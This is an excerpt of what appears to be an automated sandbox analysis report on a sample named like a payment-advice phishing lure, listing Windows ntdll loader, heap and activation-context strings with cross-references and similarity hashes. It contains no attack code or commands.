                                                                                                                                            • apphelp.dll, xrefs: 01696496
                                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016F99ED
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016F9A11, 016F9A3A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-204845295
                                                                                                                                            • Opcode ID: 6e1ed362106fecc3efbef9f8d6b502febe8baa49a5bfef3994f7c287fa0d5849
                                                                                                                                            • Instruction ID: f2bae876dcdf2f251bbedf71c3101c5937e463d3f7076769aa615dbb844e8488
                                                                                                                                            • Opcode Fuzzy Hash: 6e1ed362106fecc3efbef9f8d6b502febe8baa49a5bfef3994f7c287fa0d5849
                                                                                                                                            • Instruction Fuzzy Hash: 7A51B1712083019FE725EF24CC91BABB7E9FB84B58F00491DFA8597254DB30E949CB96
                                                                                                                                            Strings
                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01712178
                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01712180
                                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01712160, 0171219A, 017121BA
                                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0171219F
                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017121BF
                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01712165
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                            • API String ID: 0-861424205
                                                                                                                                            • Opcode ID: 8d4d798945d450e8fc0c9535cdfbe28038f85518403f166bb26f4598ff17a68a
                                                                                                                                            • Instruction ID: 32d2c0733c35233ba37b17cdb9b4c8df439853ca5a4be6d8733c9acab02d1dbd
                                                                                                                                            • Opcode Fuzzy Hash: 8d4d798945d450e8fc0c9535cdfbe28038f85518403f166bb26f4598ff17a68a
                                                                                                                                            • Instruction Fuzzy Hash: 67314876F002257BE731DA998C91F6BBB78EF65A40F26016DFA0567205D3709E01D7A0
                                                                                                                                            Strings
                                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 017181E5
                                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 01718177, 017181EB
                                                                                                                                            • LdrpInitializeProcess, xrefs: 016DC6C4
                                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01718170
                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01718181, 017181F5
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016DC6C3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                            • API String ID: 0-475462383
                                                                                                                                            • Opcode ID: d9d3ce8d5f2ce24e64313625da4ff731a1686248cf27458e58bbeef876c46b11
                                                                                                                                            • Instruction ID: 89826f8b08e8b4063b5d1b0e24f587492245f795b2820640af4aec0982bdf587
                                                                                                                                            • Opcode Fuzzy Hash: d9d3ce8d5f2ce24e64313625da4ff731a1686248cf27458e58bbeef876c46b11
                                                                                                                                            • Instruction Fuzzy Hash: A131E2726443569BC320EB2CDD8AE2AB7D5EF94B20F04065CF945AB395E620EC05C7A3
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 016E2DF0: LdrInitializeThunk.NTDLL ref: 016E2DFA
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016E0BA3
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016E0BB6
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016E0D60
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016E0D74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1404860816-0
                                                                                                                                            • Opcode ID: dec870556013b8da0a320dde031c818025ce3d060689d81a093e81deaba41406
                                                                                                                                            • Instruction ID: 3cd1d03c1e39cbb76a8a057ad64d75d10615c3bcd7a797aa77a0df51d4f8a680
                                                                                                                                            • Opcode Fuzzy Hash: dec870556013b8da0a320dde031c818025ce3d060689d81a093e81deaba41406
                                                                                                                                            • Instruction Fuzzy Hash: 3F427C72A01705DFDB21CF28C894BAAB7F5FF44304F1446A9E989DB245E770AA85CF60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                            • API String ID: 0-379654539
                                                                                                                                            • Opcode ID: c9ae8c4c9007eaf55aafe5254ed5d3020f66e101bb0cbf450ffd000f98ec54b9
                                                                                                                                            • Instruction ID: e25a662729e065c3513d8bd3fe05be13139e84ed94ca9fbeda36614fd8194817
                                                                                                                                            • Opcode Fuzzy Hash: c9ae8c4c9007eaf55aafe5254ed5d3020f66e101bb0cbf450ffd000f98ec54b9
                                                                                                                                            • Instruction Fuzzy Hash: DDC18A71108382CFD721CF98C844B6ABBE4EF84704F44896AF9958B291E734DD4ACF66
                                                                                                                                            Strings
                                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016D855E
                                                                                                                                            • @, xrefs: 016D8591
                                                                                                                                            • LdrpInitializeProcess, xrefs: 016D8422
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016D8421
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-1918872054
                                                                                                                                            • Opcode ID: 3ef9139692d96f064d1c2bbee78c295ca54a9fbecf282a255a9156c9bcd5ca38
                                                                                                                                            • Instruction ID: 960fd6e274555eee752d7221a4015a17f684135a8b2a82b8fa56299672ac39a2
                                                                                                                                            • Opcode Fuzzy Hash: 3ef9139692d96f064d1c2bbee78c295ca54a9fbecf282a255a9156c9bcd5ca38
                                                                                                                                            • Instruction Fuzzy Hash: 3191AA71909345AFDB22DF25CC94FABBBEDBF84654F40092EFA8493141E370D9048B66
                                                                                                                                            Strings
                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017122B6
                                                                                                                                            • .Local, xrefs: 016D28D8
                                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017121D9, 017122B1
                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 017121DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                            • API String ID: 0-1239276146
                                                                                                                                            • Opcode ID: 185422bee7c318c6c4215955e61bcf37c4021fb893223bbb34a83541827d3939
                                                                                                                                            • Instruction ID: 689ac84e0102abddc1c375f6c204c8d29c934443f03ca0ee2053e8febfd26f28
                                                                                                                                            • Opcode Fuzzy Hash: 185422bee7c318c6c4215955e61bcf37c4021fb893223bbb34a83541827d3939
                                                                                                                                            • Instruction Fuzzy Hash: 95A1DC31D0122A9BDB20CF69CC98BA9B3B1BF58314F2501EED908AB355D7309E81CF90
                                                                                                                                            Strings
                                                                                                                                            • RtlDeactivateActivationContext, xrefs: 01713425, 01713432, 01713451
                                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0171342A
                                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01713456
                                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01713437
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                            • API String ID: 0-1245972979
                                                                                                                                            • Opcode ID: 4fafb8637286381be3cd72e202e1ab6646a5126b94421e05f93f96996696e4ac
                                                                                                                                            • Instruction ID: 10c4cafd67a6d4e3ddbb41a9cd9c78f0233f540d34feb20ee4c5c982a072eac3
                                                                                                                                            • Opcode Fuzzy Hash: 4fafb8637286381be3cd72e202e1ab6646a5126b94421e05f93f96996696e4ac
                                                                                                                                            • Instruction Fuzzy Hash: 9361F032A806129BD7228F1DCC81B3AF7E5AF94A60F14856DED559B744DB30EC01CB95
                                                                                                                                            Strings
                                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01701028
                                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0170106B
                                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017010AE
                                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01700FE5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                            • API String ID: 0-1468400865
                                                                                                                                            • Opcode ID: df6a969dbde29c9efd45ea643e3163ead8ef1e8569b6fdb5d926e8e3d5bf5bd6
                                                                                                                                            • Instruction ID: 94b919a2f6e9a257ffa563700babe3f5ba0b195269b8743287188957fa730ddf
                                                                                                                                            • Opcode Fuzzy Hash: df6a969dbde29c9efd45ea643e3163ead8ef1e8569b6fdb5d926e8e3d5bf5bd6
                                                                                                                                            • Instruction Fuzzy Hash: 4771CDB19043059FCB21DF18CC84B9B7BE9AF55764F84056CF9898B286D334DA89CF92
                                                                                                                                            Strings
                                                                                                                                            • LdrpDynamicShimModule, xrefs: 0170A998
                                                                                                                                            • apphelp.dll, xrefs: 016C2462
                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0170A992
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0170A9A2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-176724104
                                                                                                                                            • Opcode ID: b203349e610f9be2611df6ecdcfb5c32517f4bb0caa4f4728178a5edb665f4f5
                                                                                                                                            • Instruction ID: 1f9132b2eff97ebc52cc449716b109bc7dda020f538d4495fe7bd1109b2617a6
                                                                                                                                            • Opcode Fuzzy Hash: b203349e610f9be2611df6ecdcfb5c32517f4bb0caa4f4728178a5edb665f4f5
                                                                                                                                            • Instruction Fuzzy Hash: 0B3102B1640301EBDB329F69DD85E7AF7B5FB80B24F15815DE901AB285C7705986CB80
                                                                                                                                            Strings
                                                                                                                                            • HEAP: , xrefs: 016B3264
                                                                                                                                            • HEAP[%wZ]: , xrefs: 016B3255
                                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016B327D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                            • API String ID: 0-617086771
                                                                                                                                            • Opcode ID: 2e37715299b7ad73a09df504be8b810e5fcfdecde908dd098fa20c7121c5938f
                                                                                                                                            • Instruction ID: 24d2ff5f3227c118b0d6a8eb0bd3bb52bf8845d7a2f112191d0d4f181b074eb9
                                                                                                                                            • Opcode Fuzzy Hash: 2e37715299b7ad73a09df504be8b810e5fcfdecde908dd098fa20c7121c5938f
                                                                                                                                            • Instruction Fuzzy Hash: F192AA71A042599FDB25CF68C8947EEBBF1FF08304F1880ADE859AB351D735A986CB50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                            • API String ID: 0-4253913091
                                                                                                                                            • Opcode ID: 52f3c6fa0b74deb9ae07d6d2deda4508f3d400087693bae4740823782776b762
                                                                                                                                            • Instruction ID: af5c465b97d36c4dcc29f81be6b9e68a96990abb073ac53d96e2b30d6c123386
                                                                                                                                            • Opcode Fuzzy Hash: 52f3c6fa0b74deb9ae07d6d2deda4508f3d400087693bae4740823782776b762
                                                                                                                                            • Instruction Fuzzy Hash: 26F18D70600606DFEB26DF68C894BAABBF5FF44704F1481A9E5169B392D734E981CF90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $@
                                                                                                                                            • API String ID: 0-1077428164
                                                                                                                                            • Opcode ID: ebf1eb7518603aa37d0646bedb4ec759e04a07588bee93e78446bf057ec98292
                                                                                                                                            • Instruction ID: 4309935b75f295343ea9c9215ef52304248b2ef86a7ea3197482c9b42129957f
                                                                                                                                            • Opcode Fuzzy Hash: ebf1eb7518603aa37d0646bedb4ec759e04a07588bee93e78446bf057ec98292
                                                                                                                                            • Instruction Fuzzy Hash: CAC26D716083419FEB26CF29C881BBBBBE5EF88B14F04896DE98987341D734D845CB56
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                            • API String ID: 0-2779062949
                                                                                                                                            • Opcode ID: c592e8dd2ab8889af442ec167c60a0c80b1a4779db0da2fd2c96cc3e04d8fd7c
                                                                                                                                            • Instruction ID: c5426b757144e3051bdd4846610bea076fa0b812171f43b451e7bf9a14f8732a
                                                                                                                                            • Opcode Fuzzy Hash: c592e8dd2ab8889af442ec167c60a0c80b1a4779db0da2fd2c96cc3e04d8fd7c
                                                                                                                                            • Instruction Fuzzy Hash: E1A178729112299BDF31DF68CC88BEAB7B9EF44700F0041EAEA08A7210D7359E85CF54
                                                                                                                                            Strings
                                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0170A10F
                                                                                                                                            • LdrpCheckModule, xrefs: 0170A117
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0170A121
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-161242083
                                                                                                                                            • Opcode ID: 2526ae26bfe68f08c298eaa0274ce4fe826e54201b6f7f37972faefdd746d1a1
                                                                                                                                            • Instruction ID: 359a22391877209e18749a3aaca73b94c6dd1e93e43debebe205c5c4df7ff47b
                                                                                                                                            • Opcode Fuzzy Hash: 2526ae26bfe68f08c298eaa0274ce4fe826e54201b6f7f37972faefdd746d1a1
                                                                                                                                            • Instruction Fuzzy Hash: 7C71CD75A00306DFDB26DF68CD81ABEB7F5FB44A14F14806DE902AB351E734A986CB50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                            • API String ID: 0-1334570610
                                                                                                                                            • Opcode ID: 61bbc0efab796912eb8a3867892337405b960a897e8961f32a606f5965c440d2
                                                                                                                                            • Instruction ID: cf56e481af9d70f53f823eb15115048c83d87d8d22402f800d9cd528b3ed993d
                                                                                                                                            • Opcode Fuzzy Hash: 61bbc0efab796912eb8a3867892337405b960a897e8961f32a606f5965c440d2
                                                                                                                                            • Instruction Fuzzy Hash: 5B617A71600301DFDB29CF28C884BAAFBF5FF45708F148599E85A8B296D771E881CB91
                                                                                                                                            Strings
                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 017182D7
                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 017182DE
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017182E8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-1783798831
                                                                                                                                            • Opcode ID: bf2fc12f03da777b80e97094305ed07215e76e1c016b3cc601072fa4f9eb190f
                                                                                                                                            • Instruction ID: e65de863a911a607f98775354a2c33ca33cf6596799e6462ee9c04f8a0ac1401
                                                                                                                                            • Opcode Fuzzy Hash: bf2fc12f03da777b80e97094305ed07215e76e1c016b3cc601072fa4f9eb190f
                                                                                                                                            • Instruction Fuzzy Hash: 8A412471944305ABD721EB68DC84BABB7E8EF48B20F01892EF949C3254E770D805CBD5
                                                                                                                                            Strings
                                                                                                                                            • PreferredUILanguages, xrefs: 0175C212
                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0175C1C5
                                                                                                                                            • @, xrefs: 0175C1F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                            • API String ID: 0-2968386058
                                                                                                                                            • Opcode ID: 0633973ca6dcf30378b61fb425fa82d82397f08550ae60c3509cf87527bea276
                                                                                                                                            • Instruction ID: 40d1e89b3ca41b5fa55475ea632aa1051134315ca6b52684838a4b2004cb835b
                                                                                                                                            • Opcode Fuzzy Hash: 0633973ca6dcf30378b61fb425fa82d82397f08550ae60c3509cf87527bea276
                                                                                                                                            • Instruction Fuzzy Hash: DF419271E04319EBDF52DAD8CC95BEEFBBDAB18744F00416AEA05B7240D7B49E448B90
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                            • API String ID: 0-1373925480
                                                                                                                                            • Opcode ID: 201c2d5a4275a8719dc6c4e8916b78fa2fbbb6f6080a35853ce1bde7f321c4fc
                                                                                                                                            • Instruction ID: 1c04784b3349eef123855b218e2263ac2a16624cd70ac53efb4650f25c0e6f6f
                                                                                                                                            • Opcode Fuzzy Hash: 201c2d5a4275a8719dc6c4e8916b78fa2fbbb6f6080a35853ce1bde7f321c4fc
                                                                                                                                            • Instruction Fuzzy Hash: 7E41EF32A046588BEB2ADBA8CC44BADFBB9FF95340F14045AD942BB792D7348901CB51
                                                                                                                                            Strings
                                                                                                                                            • LdrpCheckRedirection, xrefs: 0172488F
                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01724888
                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01724899
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                            • API String ID: 0-3154609507
                                                                                                                                            • Opcode ID: 1dfbcc6d1ece7b0598f37c2664d2745f53453e29494c5e4904346127ed4efe6d
                                                                                                                                            • Instruction ID: e82ee7a534438094a14d058fd0ff1d8fc154501b14d5118a5b4c880d26c838ed
                                                                                                                                            • Opcode Fuzzy Hash: 1dfbcc6d1ece7b0598f37c2664d2745f53453e29494c5e4904346127ed4efe6d
                                                                                                                                            • Instruction Fuzzy Hash: 6741BE32A542719FCB21CE68D840A26FBE5FF49A60F0606A9ED5A9B315D770D802CB91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                            • API String ID: 0-2558761708
                                                                                                                                            • Opcode ID: eb9bc46a02b15d8285cd8a8d13a62eb69642b3c570d41acf47c7986e09c0c323
                                                                                                                                            • Instruction ID: 40a8d209e7bbe7321643b45d0771f3df7123e98ff71f3c3b865c2f07deb47a31
                                                                                                                                            • Opcode Fuzzy Hash: eb9bc46a02b15d8285cd8a8d13a62eb69642b3c570d41acf47c7986e09c0c323
                                                                                                                                            • Instruction Fuzzy Hash: 0B11DF31354202DFDB2ACB18C884FBAFBA9EF40A25F19819DF406CB291DB30D881CB54
                                                                                                                                            Strings
                                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 017220F3
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01722104
                                                                                                                                            • LdrpInitializationFailure, xrefs: 017220FA
                                                                                                                                            Memory Dump Source
